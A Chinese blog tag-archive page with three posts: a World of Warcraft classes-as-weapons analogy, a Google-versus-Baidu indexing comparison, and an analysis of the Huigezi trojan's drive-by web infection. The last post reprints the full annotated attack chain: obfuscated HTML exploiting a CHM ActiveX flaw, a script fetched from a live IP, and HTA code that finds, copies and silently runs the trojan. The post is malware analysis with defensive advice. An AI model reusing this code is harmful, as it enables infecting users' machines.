Tag Archives: 分析

1。战士，很多人说战士是坦克，其实我认为不对。没有哪个军队会让自己的主站坦克暴露在敌人密集的火力下，这样的话再强的装甲也烂了。我认为战士应该是航空母舰。航空母舰存在的意义不在于他本身有多么高的攻击力。而在于航母是一个移动的基地，可以给队友提供倾泻攻击力的机会。当你看到一艘航母的时候，你就等于看到了n架飞机，n艘军舰和nn多的人。这个和战士很像，你看到战士的时候，你一定可以看到很多的人。这也可以解释为什么有人说战士在野外一个人不好混。因为，你见过航母出港口不带飞机和军舰的吗？这无疑是自杀。

2。牧师，牧师并不能提供很高的战斗力（暗牧和ss放在一起讨论），但是他可以提供很好的恢复能力，并且以此来大幅度提高整个战斗团队的持续战斗的能力，也就提高了战斗力。所以牧师是典型的空中加油机。

3。法师，法师是轰炸机。他可以用重磅炸弹对重点目标重点打击（3开大火球）。也可以用常规炸弹进行空袭（奥爆）。所以他是轰炸机，类似于B-2。

4。盗贼，没说的，盗贼一定是核潜艇（我们中国的核潜艇技术世界一流）。遇到敌人就下潜（隐身）然后准备核攻击（冷血伏击+背刺），如果打不过，可以拼命的下潜逃跑（消失），这不是核潜艇是什么？

5。骑士，骑士应该是护卫舰。有一定的攻击能力，也有防护能力，对保护航母编队很有帮助。根据不同的天赋配点，也可以细分为护卫舰和驱逐舰。

6。术士，术士是典型的战斗机。战斗机主要用于空战，他可以携带导弹（暗影剑）也可以用机载火炮（各种dot）来攻击。导弹就不说了，说说机载火炮。虽然机载火炮不象导弹一样可以马上摧毁敌人的有生力量。但是在空战中打中敌方飞机的机身、尾翼和窗户都是致命的，可以让敌人慢慢的死去。所以说术士是战斗机，类似于苏-27，F-16和大黄蜂等。术士放的眼睛就是战斗机的机载雷达，可以侦察用。而且如果是一个带了小鬼或者女人的，喝隐身药水并且用侏儒缩小装置的术士，就从普通的战斗机升级成隐行战斗机了。暗牧和术士类似，不过没有术士这种战斗机所携带的导弹而已。

7。猎人，猎人还有什么可说的？猎人就是导弹发射器。只要他看到了敌人，就可以把他的导弹（宠物）发射出去。如果这个猎人给敌人标记了，而且恰好他是兽王系的猎人。那么他就从常规导弹升级成为超远程精确制导原子弹了。

8。小d，小d我想了一晚上也不知道他应该怎么比喻。恢复的小d可以做空中加油机（虽然没有牧师的专业加油机强大），野性变熊的小d可以做主战坦克（不是航母），变猫的小d可以做核潜艇（但是遇到打不过的情况，不能用疯狂下潜也就是消失的方法逃跑）。旅游形态和变猫的小d也可以做传令兵和侦察兵。所以小d真不好说。暂时将小d比喻成变形金刚了。

9。萨满，我是联盟，不过从公测开始的老玩家应该都有印象，sm当时很强的，似乎是第一个被人称为bug的职业。相比74他可以变形，相比小d他可以穿锁甲用盾。不过这都是往事了。现在的sm似乎怨念越来越多。也似乎成了被人遗忘的职业。那么把sm比喻成什么好呢？想了半天，我终于找到了一个合适sm的称呼——二战退伍老兵。

　　以下则为来自dreadnought同学的纵向对比：

防战：步兵战车，自身火力可以忽略不计，但能够为友军提供可观的掩护
武战：主战坦克，火力和装甲都说得过去
狂战：攻击直升机，能够快速突破防线并倾泻打击，也拥有一定的装甲

神戒牧：内设AWACS的大型运输机
暗牧：AC-130炮艇机

法师都是导弹兵。奥法是多弹头、火法是SCUD，三开是核弹头，曾经有一个时代还能超视距发射巡航导弹OTL。

刺杀贼：核潜艇
敏锐贼：静音水流推进核潜艇
战斗贼：二战时期带炮塔喜欢浮上水面的潜艇

射击猎：自行火炮(另：NE猎是狙击手……至少目前是)
兽王猎：作战指挥部直属的自行火炮
生存猎：与工兵营关系很好的自行火炮

痛苦术：生化弹头火箭炮
恶魔术：带ECM和ECCM的火箭炮
毁灭术：高爆弹头多管火箭炮

平衡德：火箭助推水陆两用重装甲突击炮
野性德：火箭助推水陆两用重装甲隐形突击炮
恢复德：火箭助推水陆两用重装甲隐形10吨辎重大卡车

防护骑：搭载了神盾的护卫舰
惩戒骑：搭载了神盾的驱逐舰
神圣骑：搭载了神盾的补给舰

元素萨：多炮塔战列舰
增强萨：安装了3联12英寸主炮的多炮塔战列舰
恢复萨：改装成货船的退役多炮塔战列舰

NT、2003系统审核策略的分析

google与baidu搜索的分析

1 Reply

这个域名已经使用了大概3个月了。文章有了253篇了。

使用mt，也是为了生成静态，便于搜索引擎查找。现在看看效果：

google：可以搜索到384篇。平均1天扫描站点2-3次

baidu：可以搜索到8380篇，每小时扫描2次

但还有一个Inktomi Slurp的搜索引擎，扫描次数也是不低，仅仅次于baidu。但我不知道是从何而来

再看看搜索后的结果：

对于google，搜索到的排名靠前的，都是分类或者日期的归档，几乎所有的单篇归档或者文章，都被忽略。

而对于baidu，几乎所有的归档都可以搜索到。且排序上不能很严格的看出是单篇归档，还是分类等。

然后对比车东的blog，却可以在google上得到比baidu多的多得结果。

再来看网站的来自于搜索引擎的页面：

可以看到，baidu对比google，已经是10倍的关系了。这个也是和收录的网页数目有关。

所以分析来，主要有以下几点原因吧：

1、google的扫描似乎会判断文件日期。而对于mt，每次修改模版，都会重建所有页面，导致了google中认为你的网站不稳定，而google对于经常变动的文章不会收录。而baidu似乎则相对宽松。几乎我发布的文章，第二天就会出现。

2、google对于一个页面的判断，还是偏重于<h1></h1>标签。google认为，一个页面的标题，或者主要内容，主要是有<h1>中的内容决定，而不是考虑<title></title>。这样就导致对于mt的一个问题。mt所有页面在默认模版中，都是使用<h1>来标定blog的名字。也就是说，我所有的页面的这一部分信息，都是meteor’s blog。对于google来说，这就是类似页面，或者说是相同页面，也就会在搜索结果中忽略，不被收录。而baidu则要好得多，采用<title>来重点判断我的页面信息。以<title>来进行收录。

所以来说，mt对于google来说，优势主要在于，使用静态页面，便于搜索。而且目录结构合理，最多2级，符合google的习惯。而缺点也很明显，默认的<h1>内容不适合google的搜索，导致重复结果太多。

由此可见，如果想要得到更好的收录，需要重新来订制下网页结构。

下一步要做的，就是重新修改模版。使得blog的题目在<h1>中出现。并且减少模版修改次数，使得生成的页面可以保持长时间不用重建。

灰鸽子木马网页传播分析

2 Replies

最近中灰鸽子木马的人不少，分析一下灰鸽子的网页传播方式

黑鸽子会产生一个frame，如下：

<iframe src="http://www.qq.com/" width="800" height="600"></iframe> <script language=javascript>ie=’fucksnow’;ver=navigator.appVersion;if(!(ver.indexOf(‘NT 5.0′)==-1))ie=’nt’;if(!(ver.indexOf(‘Windows 98′)==-1)){ie=’98’;}location.href=ie+’.htm’;</script>

页面中嵌入的iframe是掩人耳目的，重要的不是ifrme部分，而是后面的javascrpit部分

<iframe src="http://www.qq.com/" width="800" height="600"></iframe>   //掩人耳目
<script language=javascript>
ie=’fucksnow’;                //定义变量ie=fucksnow
ver=navigator.appVersion;   //获得浏览器版本
if(!(ver.indexOf(‘NT 5.0′)==-1)) ie=’nt’;      //如果是2k系统则ie=nt
if(!(ver.indexOf(‘Windows 98′)==-1)) {ie=’98’;}   //定义变量ie=98
location.href=ie+’.htm’;    //重定向到 ie+’.htm’
</script>

佩服作者的细心，这三个htm：98.htm nt.htm 和fucksnow.htm只有一个地方不同，就是利用的chm文件的所在位置不一样，作者根据98 2k和 xp的帮助文件位置不同设置了几个不同的运行条件，从这方面看作者到做的非常好，比国内很多的软件商都要好得多

我们以fucksnow.htm为例做分析：如果直接查看fucksnow.htm的源代码可以看到里面似乎是乱码，其实不然，这是利用了IE解析Html代码的时候忽略空格的特性。我们把里面所有的空格去掉，再稍微整理，就可以看到下面的代码了（空格都被去掉了，代码有点乱）。

<SCRIPTlanguage=VScriptsrc="mmmmm.gif"></SCRIPT> //加载mmmmm.gif，这个其实不是图片，后面会说到
<SCRIPTlanguage=VScriptsrc="xxxxx.pif"></SCRIPT> //加载xxxxx.pif，灰鸽子木马
<HTML><BODY>
<divstyle="display:none">
//利用chm漏洞
<OBJECTid="news140"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAMname="Command"value="RelatedTopics,MENU"><PARAMname="Window"value="$global_ifl">
<PARAMname="Item1"value=’command;/windows/help/apps.chm’);</OBJECT>
<OBJECTid="news162"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAMname="Command"value="RelatedTopics,MENU"><PARAMname="Window"value="$global_ifl">
//利用chm漏洞执行mmmmm.gif里面的脚本程序
<PARAMname="Item1"value=’command;javascript:eval("document.write("<SCRIPTlanguage=JScriptsrc="http://218.106.9.136/inc/mmmmm.gif""+String.fromCharCode(62)+"</SCR"+"IPT"+String.fromCharCode(62))")’>
</OBJECT>
</div>
<SCRIPT>news140.Click();f1=1+1;f1=f1+2;setTimeout("news162.Click();",0);fu1=2;fu1=3+4;</SCRIPT></BODY></HTML>
//又是一个障眼法，重定向到http://xuemulove.com/a.gif，文件不存在
<iframesrc="http://xuemulove.com/a.gif"width="0"height="0">
</iframe><BODYonload="window.status=’页面已装载!’">

mmmmm.gif分析：代码隐藏原理和fucksnow.htm一样，替换掉空格后看到以下代码

document.write(‘<html><HEAD><SCRIPTlanguage=JScript>window.moveTo(4000,4000);window.resizeTo(0,0);</SCRIPT></HEAD></html>’);    //把弹出窗口移到x,y=4000,4000的位置，另你看不到
//利用ADODB写文件
try{BOSSYU=newActiveXObject("ADODB.Recordset");BOSSYU.Fields.Append("a",200,3000);BOSSYU.Open();BOSSYU.AddNew();BOSSYU.Fields("a").Value="
//写进去的代码
<HTML><BODYonLoad="window.moveTo(4000,4000);">
<HEAD><SCRIPTlanguage=JScript>window.moveTo(4000,4000);window.resizeTo(0,0);</SCRIPT></HEAD>
//利用HTA执行所需要的操作
<HTA:APPLICATIONID=kk3714CAPTION="no"BORDER="none"HEIGHT="0"SHOWINTASKBAR="no"WIDTH="0">
<BODYscroll="no"leftmargin="0"topmargin="0"marginwidth="0"marginheight="0">
<SCRIPTLANGUAGE="JavaScript">
//在打开fucksnow.htm的时候已经加载了xxxxx.pif文件，这时该文件已经在IE的缓存中。由于IE的一些特性，该文件会被保存为xxxxx[1].pif xxxxx[2].pif等类似的文件名，下面的程序子就是为了把他找出来，并执行他
function thanks(b){
try{
varc=new Enumerator(YUri.GetFolder(b).SubFolders);
for(;!c.atEnd();c.moveNext())
{var zI01=c.item().Path+"xxxxx[1].pif";
var z1=c.item().Path+"xxxxx[2].pif";
var f="C:boot.exe";
if(YUri.FileExists(zI01))     //找到木马文件xxxxx[1].pif
{YUri.CopyFile(zI01,f)     //copy到 c:boot.exe
w00sh.Run(f,0,false);      //执行木马
v=1;break;}
if(YUri.FileExists(z1))        //同上，只不过文件名为xxxxx[2].pif
{YUri.CopyFile(z1,f);
w00sh.Run(f,0,false);
v=1;break;}
thanks(c.item());}}
catch(e){}}
function agree(){
path="c:boOt.bat";     //建立boot.bat批处理
v=kk3714.commandLine;
v=v.substring(1,v.length-2);
var_w=YUri.CreateTextFile(path);
_w.Write(‘@eCho oFf rn:ArnDeL"’+v+’"rnifeXiSt"’+v+’"gOtoArnDEl%0′);   //写命令到boot.bat里面，BAT里面的内容：
====================
@echo off
:a del v     //删除v , v为该执行文件c:bootlog.hta
if exist v goto a   //如果还没删除则转到 a，继续执行删除操作
del 0%    //自删除
====================
_w.close();
w00sh.Run(path,0,false);
window.close();
}
//获得IE缓存存放位置以查找xxxxx.pif
varv=0;
try{
varYUri=newActiveXObject("Scripting.FileSystemObject");
varw00sh=newActiveXObject("WScript.Shell");
varcache=w00sh.RegRead("HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerShellFoldersCache");
}catch(e){}
function fish()
{try{if(v==0){thanks(cache+’..’);setTimeout("fish()",4000);}else{agree();}}catch(e){}}
fish();</SCRIPT></BODY></HTML>";
//存为c:bootlog.hta并执行
BOSSYU.Update();}catch(e){}try{BOSSYU.Save("c:bootlog.hta",0);}catch(e){}document.write(‘<objectid="bbs1"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><paramname="Command"value="shortcut"><paramname=item1value=",c:bootlog.hta"></object>
<OBJECTid="bbs2"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><paramname="Command"value="Close"><paramname=kav"value="out"></oBjEct>
<ScRipt>c=1;bbs1.Click();c=1;c=c+5;bbs2.Click();c=c+1;</script>’);

基本上是利用了chm漏洞，如果系统打过所有补丁是不会中招的；临时禁用java script也可以防止。

System Admin/Developer's Blog

Windows, VMware, Citrix, FreeBSD,Web servers and Coding…

Tag Archives: 分析

浅析 NIS 的特点和适用用户群

WoW职业的军事分析

NT、2003系统审核策略的分析

google与baidu搜索的分析

灰鸽子木马网页传播分析